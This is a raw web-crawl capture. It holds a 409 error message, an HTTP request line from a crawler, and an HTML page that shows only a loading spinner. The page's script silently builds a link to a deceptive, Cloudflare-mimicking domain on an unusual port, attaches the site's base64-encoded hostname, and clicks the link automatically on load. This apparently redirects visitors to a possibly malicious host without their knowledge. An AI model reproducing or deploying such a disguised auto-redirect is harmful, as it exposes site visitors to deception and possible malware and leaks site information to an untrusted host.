409 Conflict indicates that the request could not be completed due to a conflict with the current state of the resource.
The user should resolve the conflict and try the request again.
GET / HTTP/1.1 Host: 3h.com Accept: */* User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,initial-scale=1"> <style> .spinner { height: 85vh; display: -webkit-box; display: -ms-flexbox; display: flex; -webkit-box-pack: center; -ms-flex-pack: center; justify-content: center; -webkit-box-align: center; -ms-flex-align: center; align-items: center } .spinner>div { width: 18px; height: 18px; margin: 0 4px; background-color: #333; border-radius: 100%; display: inline-block; -webkit-animation: sk-bouncedelay 1.4s infinite ease-in-out both; animation: sk-bouncedelay 1.4s infinite ease-in-out both } .spinner .bounce1 { -webkit-animation-delay: -.32s; animation-delay: -.32s; background-color: #f05125 } .spinner .bounce2 { -webkit-animation-delay: -.16s; animation-delay: -.16s; background-color: #7fbb42 } .spinner .bounce3 { background-color: #32a0da } @-webkit-keyframes sk-bouncedelay { 0%, 100%, 80% { -webkit-transform: scale(0) } 40% { -webkit-transform: scale(1) } } @keyframes sk-bouncedelay { 0%, 100%, 80% { -webkit-transform: scale(0); transform: scale(0) } 40% { -webkit-transform: scale(1); transform: scale(1) } } </style> </head> <body> <div class="spinner"> <div class="bounce1"></div> <div class="bounce2"></div> <div class="bounce3"></div> </div> <a href="" id="a"></a> <script> var strU = 'https://dashvip.cloudflare.com.cloudflare.bar.cdn.cloudflare.net:1856/.js?__tls=' + btoa(window.location.host); if (document.getElementById("a").href = strU, document.all) document.getElementById("a").click(); else { var e = document.createEvent("MouseEvents"); e.initEvent("click", !0, !0), document.getElementById("a").dispatchEvent(e) }; </script> </body> </html>